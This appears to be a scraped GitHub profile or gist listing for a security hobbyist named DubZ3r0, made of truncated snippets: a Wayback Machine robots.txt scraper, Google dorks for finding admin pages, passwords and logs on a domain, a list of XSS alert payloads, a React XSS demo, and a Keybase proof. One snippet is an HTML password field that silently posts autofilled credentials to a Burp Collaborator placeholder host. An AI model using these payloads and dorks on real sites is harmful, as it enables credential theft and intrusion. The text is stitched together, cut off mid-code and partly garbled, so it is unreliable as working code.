DubZ3r0

import requests
import re
import sys
from multiprocessing.dummy import Pool


def robots(host):
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx\
        ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)

DubZ3r0

# Searching vulnerability by CVE in BugTraq
site:www.securityfocus.com intext:CVE-2020-7059
# Other
site:.domain.com allintext:(root|admin|password)
site:.domain.com intitle:(admin|login|internal)
site:.domain.com inurl:(admin|login|logout|crm|cms)
site:.domain.com "powered by"
site:.domain.com filetype:pdf
site:.domain.com allintext:password filetype:log after:2019

DubZ3r0

// if users use password managers to autofill credentials
<input name='username' id='username'>
<input type='password' name='password' onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

DubZ3r0

<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(�XSS�)</script> 
<script>alert(�XSS�);</script>
<script>alert(�XSS�)</script>
�><script>alert(�XSS�)</script>
<script>alert(/XSS�)</script>
<script>alert(/XSS/)</script>

DubZ3r0

import React, { useState } from "react";
import DOMPurify from 'dompurify';



function Xss(){
    const [text, setText] = useState("");
    const [script, setScript] =useState("");
    const [imgg, setimgg] = useState("");

DubZ3r0

### Keybase proof

I hereby claim:

  * I am dubz3r0 on github.
  * I am dubz3r0 (https://keybase.io/dubz3r0) on keybase.
  * I have a public key ASD4R2PoMtWqqt-yuIEqZcP1blfUsCWOz85Y3SgSJJzRrwo

To claim this, I am signing this object: